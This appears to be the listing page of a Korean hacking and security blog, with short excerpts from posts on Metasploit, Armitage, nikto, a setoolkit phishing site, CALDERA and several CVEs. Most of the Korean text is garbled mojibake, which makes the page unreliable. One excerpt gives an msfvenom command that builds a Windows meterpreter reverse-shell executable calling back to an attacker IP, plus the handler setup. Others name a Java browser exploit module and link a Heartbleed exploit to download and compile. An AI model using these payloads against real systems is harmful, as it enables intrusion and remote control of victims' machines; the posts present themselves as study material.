728x90 ๋ฐ์ํ Metasploit33 nikto ์ฌ์ฉ๋ฒ๊ณผ ์ฝ๊ฐ์ ์๋ฌธ์ ? ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์์ฆ nikto๋ฅผ ๋ง์ด ์ฌ์ฉํ๋ ๊ฒ๊ฐ๋ค. ๊ฐ๋จํ๊ฒ ์ฌ์ฉํ๊ธฐ ์ข์์ ์กฐ๊ธ์ฉ ์ฌ์ฉํ๋ค. web์ทจ์ฝ์ ์ ์ฐพ๊ธฐ์ํด ์ฌ์ฉ์ ํ๋๊ฒ๋ณด๋จ backupํ์ผ ๋ฑ์ ์ฐพ๊ธฐ์ ํธ๋ฆฌํ๊ธฐ ์ํด ์ฌ์ฉ์ ๋ง์ด ํ๊ณคํ๋ค. nikto๋ฅผ ์ฌ์ฉํ๋ ๋ช ๋ น์ด๋ ๋จ์ํ๊ฒ ์ ๋ ฅ์ ํด๋๋๋ค. ๋จผ์ ์ฌ์ฉํ๋ ๋ฒ์ ์๋์ ๊ฐ๋ค.nikto -h domain -C all ์ด๋ ๊ฒ ๊ฐ๋จํ ์ต์ ์ ์ฃผ๊ณ ํ๋ฉด ๋๋ค. delay ๋ฑ ์ต์ ๋ค์ด ์ฌ๋ฌ๊ฐ๊ฐ ์๋๋ฐ ์ฐจ์ฐจ์ฐ๋ฉด.. Metasploit/Kali & Backtrack 2024. 7. 2. CVE-2023-22527 : Atlassian Confluence ์ทจ์ฝ์ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๋ํ ์ฝ๊ฐ์ ํ๋ฆฐ๋ด์ฉ ๋ฐ ์ฌ์ฉ๋ ์ทจ์ฝ์ ์ด ์ถ๊ฐ์ ์ผ๋ก ์์์ ์๋ ค๋๋ฆฝ๋๋ค. ๋ช๋ฌ์ ํ ๋ ๊ทธ๋จ์ ํตํด ๋ํ๊ต, ์ฌ๋ฌ๊ธฐ๊ด์ ๋ฐ์ดํฐ๊ฐ ์ ์ถ๋ ์ผ์ด ์์๋ค. ๊ณต๊ฒฉ์๋ ์ค๊ตญ์ ๋์์ผ๋ก ๋ถ๋ฆฌ๋ ํด์ปค๋ก ์์๋์์ผ๋ฉฐ ํ ๋ ๊ทธ๋จ์ ํตํด ์ค์ ๋ฐ์ดํฐ๋ค์ด ์ ์ถ์ด ๋์๋ค. ๋ช ์ (์ค)์ ์๋๊ณ ์๋ ์ํฉ์ด๋ผ ๊ณตํด์ผ์ ๋ํ ๊ณต๊ฒฉ์ ์งํํ ๊ฒ์ด๋ผ๊ณ ์๊ณ ๋ ํ์ผ๋ ๋์์ ํ ๋ ๊ทธ๋จ์ ํตํ๋ฐ๋ก๋ ๋ฌธ์ ์ ์์ง๊ฐ ์๋ ๋ถ๋ถ์ ์๋ก ์คํด๋ฅผ ํ๊ณ ๋ง๋ฌด๋ฆฌ๊ฐ ๋์๋ค.. Metasploit/Vulnerability 2024. 3. 3. kali setoolkit์ ์ด์ฉํ ํผ์ฑ ์ฌ์ดํธ ๋ง๋ค๊ธฐ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. kali๋ฅผ ์ฌ์ฉํ๋ค ๋ณด๋ฉด ํผ์ฑ์ฌ์ดํธ๋ฅผ ๋ง๋ค๊ฑฐ๋ ํ ์คํธ ์ฉ์ผ๋ก ๊ฐ์ง ์ฌ์ดํธ๋ฅผ ๋ง๋ค์ด์ผ ํ๋ ๊ฒฝ์ฐ๊ฐ ์๋ค. ์ด๋ ์ฃผ๋ก ์ฌ์ฉํ๋ ๋๊ตฌ๊ฐ setoolkit ์ด๋ผ๋ ๋๊ตฌ์ธ๋ฐ ํผ์ฑ ์ฌ์ดํธ๋ฅผ ๋ง๋๋ ๊ฒ ๋ฟ์๋ ์คํธ๋ฉ์ผ ๋ฑ ์ฌํ๊ณตํ ๊ธฐ๋ฒ์์ ์ฌ์ฉํ๋ ๊ณต๊ฒฉ๊ธฐ๋ฒ๋ค์ด ๋ค์ํ๊ฒ ์ฌ์ฉํ ์ ์๋ค. setoolkit์ ์ฌ์ฉํ๊ธฐ ์ํด์ ๋จผ์ msfdb์ postgresql์ ์คํ ํด์ผํ๋ค. sudo service postgresql.. Metasploit/Kali & Backtrack 2023. 9. 8. ๋ชจ์ํดํน์ ํด๋ณด์! -armitage 2ํธ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. 2023.08.18 - [Metasploit/Kali & Backtrack] - ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์ blog.z3alous.xyz ๋ช์ผ ์ ์ ์์ ๊ธ์ ์์ฑํ์๋ค. ์ด.. Metasploit/Kali & Backtrack 2023. 8. 21. ๋ชจ์ํดํน์ ํด๋ณด์!-armitageํธ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ฝ 1๋ฌ ์ ์ฏค toss์์ ๋ง๋ค์ด์ง ์์์ ๋ณด์๋ค. ํด๋น์์์ด๋ค. https://youtu.be/tAqgvP07RnQ ํด๋น ์์์ ๋ณด๋๋์ ์๊ฐ ๊ฐ๋์ค ๋ชจ๋ฅด๊ณ ๊ณ์ ๋ณด๊ณ ์์๋ค. ํด๋น ๋์์์ ๋์ค๋ ๋ถ๋ค์ ์ค์ ๋ก ์๋ ๋ถ๋ค์ด์ง๋ง ์ด๋ ๊ฒ ๋ณด๋ ๋๋์ฑ ๋ฉ์์ด ๋ณด์๋ค. 'ํ ์ค๋ฅผ ํดํนํ๋ ์' ๋ผ๋ ์์์ ๋ณด๊ณ ์ฌ๋ฌ๊ฐ์ง์ ํฅ๋ฏธ๋ฅผ ๊ฐ์ก๋ค. forensic์ ์ฃผ๋ก ํ๋ ๋์๋๋ฐ ์ ๋ฌด๋ฅผ ํ๋ฉด์ ์กฐ๊ธ์ฉ ์ทจ์ฝ์ ๊ณผ ๋ชจ์ํดํน.. Metasploit/Kali & Backtrack 2023. 8. 18. CALDERA๋ฅผ ํตํ ์๋๋ฆฌ์ค ์นจํฌ ํ ์คํธ(์์ด์ ํธ์ค์น) ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ ๋ฒ์ ํฌ์คํ ์ caldera๋ฅผ ์ค์นํ๋ ๋ฐฉ๋ฒ์ ๋ํด ์์ฑํด๋ณด์๋ค. 2022.10.27 - [Metasploit/MiTRE ATT&CK] - MITRE ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ๋์ ํ๊ธฐ 1 MITRE ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ๋์ ํ๊ธฐ 1 ๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ๋ฐ์ ํ ์กฐ๊ธ์ฉ ์ฝ์ด๋ณด์๋ค. MITRE ATT&CK(์ดํ ๋ง์ดํฐ)์ด๋ ๋จ์ฒด๋ ํดํน๊ด๋ จ ์ ๋ฌด ๋ฐ .. Metasploit/MiTRE ATT&CK 2022. 11. 17. Nexpose ๊ถ๊ธ์ฆ์ด ํ๋ฆฌ๋ ์๊ฐ ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ๋ช์ผ์ ์ ์ด๋ฌํ ๊ธ์ ์ฌ๋ฆฐ์ ์ด ์๋ค. 2022.11.06 - [Metasploit/Vulnerability] - Nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ์๋ฌธ์ธ์ ? Nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ์๋ฌธ์ธ์ ? ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์ blog.z3alous.xyz ์ด๊ฒ.. Metasploit/Vulnerability 2022. 11. 11. Nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ์๋ฌธ์ธ์ ? ํด๋น ๋ธ๋ก๊ทธ๋ ํดํน ๋ฐ ๋ณด์ ๋ธ๋ก๊ทธ๋ก ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก ์์ฑ๋์ด์ง๊ณ ์์ต๋๋ค. ์๋์ ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน ์๋ ๋ฐ ์ค์ ๊ณต๊ฒฉ์ ์๋ํ์ฌ ์ผ์ด๋๋ ๋ชจ๋ ์ฑ ์์ ๋ณธ์ธ(๋ฐ๋ผํ์)์๊ฒ ์์์ ์๋ ค๋๋ฆฌ๋ฉฐ, ๊ธ์ด์ด๋ ์๋ฌด๋ฐ ์ฑ ์์ ์ง์ง ์์ต๋๋ค. ๊ผญ ๊ณต๋ถ ๋ฐ ์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ฌ ์ฃผ์๊ธธ ๋ฐ๋๋๋ค. ๊ฐ์ฌํฉ๋๋ค. ์ต๊ทผ์ ์ ๋ฌด๋๋ฌธ์ ์ค์บ๋๋ฅผ ์ฌ์ฉํด์ผํ๋ ์ผ์ด ์์๋ค. ๊ธฐ์กด์ ์น์ค์บ๋ ๋ฑ์ ๋ง์ด ์ฌ์ฉํด๋ณด์์ง๋ง ์์คํ ์ค์บ๋ ๋ฐ CVE ์ค์บ๋๋ ์ ์ฌ์ฉํด๋ณด์ง ์์๋ค. ๊ทธ๋์ ์ด ์ฐธ์ ์จ๋ณด์์ผํด์ ์จ๋ณด์๋๋ฐ... ์ด 3๊ฐ๋ฅผ ์จ๋ณด์๋ค. openvas(GVM) nexpose nessus ์ด๋ ๊ฒ 3๊ฐ๋ฅผ ์ฌ์ฉํ๋๋ฐ.. nexpose๋ฅผ ์ฌ์ฉํ๋ฉด์ ๊ถ๊ธํ ์ ์ด ์๊ฒผ๋ค. ์ผ๋จ ํ๊ฒฝ์ ์๋์ ๊ฐ์ด ๊ตฌ์ฑํ์ฌ ํ ์คํธ๋ฅผ ํ์๋ค. victim.. Metasploit/Vulnerability 2022. 11. 6. MITRE ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ๋์ ํ๊ธฐ 1 ๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ๋ฐ์ ํ ์กฐ๊ธ์ฉ ์ฝ์ด๋ณด์๋ค. MITRE ATT&CK(์ดํ ๋ง์ดํฐ)์ด๋ ๋จ์ฒด๋ ํดํน๊ด๋ จ ์ ๋ฌด ๋ฐ ๊ณต๋ถ๋ฅผ ํ๋ ์ฌ๋๋ค ์ฌ์ด์์๋ ์ ๋ช ํ ๋จ์ฒด์ด๋ค. ์ ๋ณด์์ง์ ์์์ผ๋ก ํ์ฌ ์ง์์ฑ์ ์ ์งํ๋ ๋ฑ์ ๊ธฐ์ ๋ค์ ๋์ดํ๊ณ ํด๋น ๊ธฐ์ ๋ค์ ๋ํ ์ค๋ช ๋ฑ ์ฝ๊ฒ ๋งํด ํดํน์ด ์ด๋ฃจ์ด์ง๋ ์์์ ํดํน๋จ์ฒด๋ค์ ๊ณต๊ฒฉ ๊ธฐ๋ฒ ๋ฑ์ ๋ค๋ฃจ๋ ๋จ์ฒด์ด๋ค. ๊ณต์ ํํ์ด์ง๋ https://attack.mitre.org/ ์ด๋ค. ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด(์ดํ ์ฑ ์ด๋ผ๊ณ ์นญํจ)๋ ๋ง์ดํฐ์์ ์์ฑ๋์ด ์๋ ๊ธฐ์ ๋ค์ ๊ธฐ๋ฐ์ผ๋ก ํ์ฌ ์๋๋ฆฌ์ค ๊ธฐ๋ฐ์ ๋ชจ์ํ๋ จ ๋ฐ ๊ณต๊ฒฉ์ด ๊ฐ๋ฅํ Caldara์ ๋ํ์ฌ ๋ค๋ฃฌ๋ค. ํ์ฌ ํด๋ผ์ฐ๋(Cloud)์ ์ฌ์ฉ์ด ์ฆ๊ฐํจ์ ๋ฐ๋ผ ๋ง์ ํดํน ๊ณต๊ฒฉ๋ค์ด ์ผ์ด๋๊ณ ์๋ค. ์ด์ ๊ฐ์ข ์นจํด์ฌ๊ณ ๋ค์ด ์ผ์ด๋.. Metasploit/MiTRE ATT&CK 2022. 10. 27. Apache Commons Text RCE(CVE-2022-42889 ์ทจ์ฝ์ ) ํด๋น ๊ธ์ ํดํน๋ด์ฉ์ ํฌํจํ๊ณ ์์ผ๋ฉฐ, ๊ณต๋ถ์ฉ์ผ๋ก ์์ฑ๋ ๊ฒ์ ๋๋ค. ํด๋น ๋ด์ฉ์ ๊ธฐ๋ฐ์ผ๋ก ํดํน์ ์๋ํ๊ฑฐ๋ ์ทจ์ฝ์ ์ ์ ์ฉํ ๊ฒฝ์ฐ ๋ชจ๋ ํ์์ ๋ํ ์ฑ ์์ ์ ์ฉํ ์ฌ๋(์ฌ์ฉ์)์๊ฒ ์์ต๋๋ค. ์ ์ฉํ์ง๋ง์ธ์! ์ต๊ทผ์ Apache Commons Text๋ผ๋ ๋ผ์ด๋ธ๋ฌ๋ฆฌ์์ ์๊ฒฉ์ฝ๋์คํ ์ทจ์ฝ์ ์ด ๋ฐ๊ฒฌ๋์ด์ ํจ์น๊ฐ ๋์๋ค. ์ทจ์ฝ๋ฒ์ ์ commons text 1.5 ~ 1.9๋ผ๊ณ ๋ฐํ๋์๋ค. ํจ์น๋ 1.10์์ ์ด๋ฃจ์ด์ก๋ค. NVD์ ๋ด์ฉ์ ์๋ฌธ์ ํ์ธํด๋ณด๋ฉด Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpol.. Metasploit/Vulnerability 2022. 10. 24. [์ฑ ์๊ฐ] MITRE & ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด ์ฑ ์ ๋ฌผ ์ ๋ง ์ค๋๋ง์ ๊ธ์ ์์ฑํ๋ค์!!! ์ด์ ์ ๋ง์ ๋ง ๋ธ๋ก๊ทธ๋ฅผ ์์ฑ์ ์ ์งํ๋ ๊ฒ์ ๋์ ํด๋ด์ผ๊ฒ ์ต๋๋ค. ์ ๊ฐ ์ด๋ ๊ฒ ์ค๋๋ง์ ๊ธ์ ์ฐ๋ ์ด์ ๋!!!!! ใ Γ๋กใ Γ๋ก ์ฑ ์๊ฐ๋ฅผ ํ๊ธฐ์ํด์์ธ๋ฐ์!! ์ฑ ์ ๋ชฉ์ 'MITRE & ATT&CK ์ฌ์ด๋ฒ ๋ชจ์ ๊ณต๊ฒฉ ๋๊ตฌ ์ด๋ก ๊ณผ ์ค๋ฌด' ๋ผ๋ ์ฑ ์ ๋๋ค. ์๋์๋ ์๋์ ํด๋ณด์๋ฉด ์ฌ์ค ์ฑ ์ ์์ด์ ๋ฐ์ํ ๊ต์๋๊ป ์ฑ ์ ์ ๋ฌผ ๋ฐ์์ด์! ์ ๊ฐ CERTํ์์ ๊ทผ๋ฌด๋ฅผ ํ๋ค๋ณด๋ MITRE ATT&CK ๊ด๋ จ ์ ๋ฌด๋ ์งํ์ ํ๊ณ ์๋๋ฐ ๋ง๋ ํ ์ฐธ๊ณ ํ๊ฑฐ๋ ํ ๋งํ ์ฑ ๋ค์ด ์์๊ฑฐ๋ ์? ๊ทผ๋ฐ ์ด๊ฒ ๋ญ๋??? ํ๋์์ ์ ์ ๋ง์์ ๋ค์๋์ง ๋ญ!! ์ด๋ ๊ฒ ์ข์ ์ฑ ์ ์ถํํด์ฃผ์ จ๋จ ๋ง์ด์ฃ ? ์ฑ ํ์ง๋ถํฐ ๋ญ๊ฐ ๋๋์์ง์์ต๋๊น? ์ ๋ ํ๋ณตํ์ธ์๋ผ๋ ๋จ์ด๋ฅผ ์์ฒญ ๋ฒ ๋ฆฌ๋ฒ ๋ฆฌ ์ข์ํ๋จ๋ง์ด์์? ๊ทธ๋ฐ ์ ๋ฅผ ์ํด ๋ ์ด.. Metasploit/MiTRE ATT&CK 2022. 10. 21. Brutal – Toolkit to quickly create various payloads,powershell and virus attacks Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - ๋น ๋ฅด๊ณ ๋ค์ํ payloads, ํ์์ ธ๊ณผ ๋ฐ์ด๋ฌ์ค ๊ณต๊ฒฉ์ ์ํ ํดํท https://github.com/screetsec/brutal Metasploit 2016. 12. 28. Hack windows XP with armitage in kali ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ service postgresql start ๋ช ๋ น์ด๋ฅผ ์คํ์ํจ ํ service metasploit start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ armitage๋ฅผ ์คํ์ํจ๋ค. ์ด๋ฌํ ์ฐฝ์ ๋ณผ์์์ ํ ๋ฐ connect๋ฅผ ๋๋ฅด๊ณ yes๋ฅผ ๋๋ฅด๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด ์~~ ์~~~ ๊ธฐ๋ค๋ฆฌ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. tab์ฐฝ์์ hosts -> add hosts ๋ฅผ ๋๋ฅด๋ฉด ์ด๋ ๊ฒ victim IP๋ฅผ ์ ๋ ฅํ ์์๋๋ก ๋ฌ๋ค. ๋ฑ๋กํ OS ๋ฅผ ์์๋ณด์ ๋ค์ host ํญ์์ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ๊ณ yes ๊ทธ๋ผ ์ฝ์์ฐฝ์ ์ด๋ฌํ ๊ฒ์ ํ์ธํ ์ ์๋ค. ์ด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉํ๊ธฐ ์ํด ์ด๋ ํ.. Metasploit 2016. 12. 23. Kali Linux by pass - Hack Windows metasploit tutorial ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. Hack windows with metasploit Java Applet JMX Remote Code Execution ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์ service apache2 startservice postgresql startservice metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค. ๊ทธ ํ msfconsole์ ํด์ค๋ค. ๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.) ๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค. ์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค. ๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง.. Metasploit 2016. 12. 22. Heartbleed :) ํํธ๋ธ๋ฆฌ๋ heartbleed ๋ 2015๋ ๋ณด์ ์ทจ์ฝ์ ์ค ๋ํ์ ์ธ ์ทจ์ฝ์ ์ด๋ผ ํ ์ ์๋ค. heartbleed ์ทจ์ฝ์ ์ ๊ณต๊ฒฉ์๊ฐ ์๋ฒ์ ๋ฉ๋ชจ๋ฆฌ์ ์ผ๋ถ๋ถ์ ์ฝ์ด ์ฌ ์ ์๋ openSSL์ ์ทจ์ฝ์ ์ผ๋ก ์์ฒญํ ๋ ์์ฒญํ ๋จ์ด๊ฐ ๋ง์ฝ aaa์ด๋ฉด 3๋ฐ์ดํธ๋ฅผ ์์ฒญํ๋ฉด ๋๋๋ฐ ์ด ๋ณด๋ค ๋ ํฐ ๋ฐ์ดํธ์ธ 500์ ํ๊ฒ ๋๋ค๋ฉด aaa๋ฅผ ๋ฐํํ๊ณ ๋จ์ ๋ฉ๋ชจ๋ฆฌ๋ฅผ ๋ค๋ฅธ ๊ฐ์ผ๋ก ๋ฑ์ด ์ฃผ๋ ์ทจ์ฝ์ ์ ๋งํ๋ค. ์ทจ์ฝ์ ์ ์ค์ตํด๋ณผ ๋์๋ 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c์ฌ๊ธฐ์ ๋ค์ด์ ๋ฐ์ ํ 2. gcc 